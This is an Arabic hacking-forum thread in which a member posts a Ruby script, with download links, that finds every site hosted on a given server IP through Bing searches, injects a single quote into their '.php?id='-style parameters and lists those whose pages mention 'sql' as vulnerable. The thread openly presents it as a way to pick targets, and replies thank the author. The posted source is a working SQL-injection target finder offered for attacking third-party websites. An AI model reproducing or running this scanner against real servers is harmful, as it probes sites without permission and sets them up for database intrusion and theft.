#[حصريا] اداة لاستخراج المواقع المصابة ب sql من سيرفر

[Mcool]

السلام عليكم و رحمة الله و بركاتة
لقد لاحظت ان مشكلة استهداف المواقع تكمن في استخراج المواقع المصابة خاصة ادا كان السيرفر يحتوي على عدة مواقع لدلك برمجة اداة بالروبي تقوم باستخراج المواقع المصابة بتغرة sql
التحميل
http://www.mediafire.com/?jb5ka94djje4ep7

اي استفسار انا موجود

و من فضلكم اعطوني رايكم حول هده الأداة​

 

[cisco_security]

اها ممكن توضح اكثر عن طريقه عمل الاداة يا مان ؟
و لا ممكن شرح عنها بالتطبيق
و مشكور مسبقا

 

[Mcool]

اعدروني نسيت وضع الشرح
الشرح عبارة عن فيديو فلاشي افتحه بالمتصفح

الشرح:http://www.mediafire.com/?95h78dw0w49ea4f

 

[AhMaD-HaWLeRY]

مشكور أخي

 

[bleu moon]

يعطيك الخير يا غالي ...

 

[abdellatef]

رائعا طبعا اخوي حمزة كل شغلي الان بها

لكن يلزمك تطروها لكي لا تتعبنا بوضع عدد الصفحات

 

[DR.THMoORY]

بطل اخوي يسلمو..

 

[Mcool]

مناك تغيير بسيط في السكريبت فقط من اجل اعطاء نتائج اكتر

#/usr/bin/env ruby
# SQL_extractor by hamza119944 
# e-mail : hamzarex@hotmail.f

require 'net/http'


def web_count(server_ip,variable)
	file = File.new("website.txt","w")
	(0..6).each do |pages|
		req = Net::HTTP.get_response(URI.parse("http://www.bing.com/search?q=ip%3a#{server_ip}+%22.php%3f#{variable}%3d%22&go=&filt=all&first=#{pages*10 + 1}&FORM=PERE1")) #get the request
		bodys = req.body
		my_array = bodys.split('"')  # split the text
		my_array.each do |words| 
			if words.scan("#{variable}=").size > 0 then #scan for the .php?id=
				if words.scan("http://").size > 0 then
					file.puts words
				end	
			end
		end		
	end
	file.close
end
def check_sql()
	file = File.open("website.txt","r")
	file.each_line do |x|
		web_v = x+"'"
		web_v["\n"]=""
		sql = Net::HTTP.get_response(URI.parse(web_v))
		if sql.body.downcase.scan("sql").size > 0 then
			puts "this web is vulnerable : #{x}"
		end
	end
end

if ARGV.size .eql?(2) == false 
	puts "\nusage [server ip] [variable] ex: ruby SQL_extractor 127.0.0.1 id "
else 
	begin 
		puts "################################"
		puts "# SQL_extractor by hamza119944 #"
		puts "# e-mail : hamzarex@hotmail.fr #\n"
		puts "################################"
		web_count(ARGV[0],ARGV[1])
		check_sql()
	rescue
		puts "can't extract website"
	end
end

 

[ssmba]

جميل جدا جري العمل بالأداة

 

[التل الصامت]

اداه كويسه تسلم يمينك يا بطل
..

 

[sam.zzz]

رد: #[حصريا] اداة لاستخراج المواقع المصابة ب sql من سيرفر

مشكوررررررررررر

 

[Hexo]

رد: #[حصريا] اداة لاستخراج المواقع المصابة ب sql من سيرفر

goof

 

[tito4418]

رد: #[حصريا] اداة لاستخراج المواقع المصابة ب sql من سيرفر

niceeeeeeeeeeee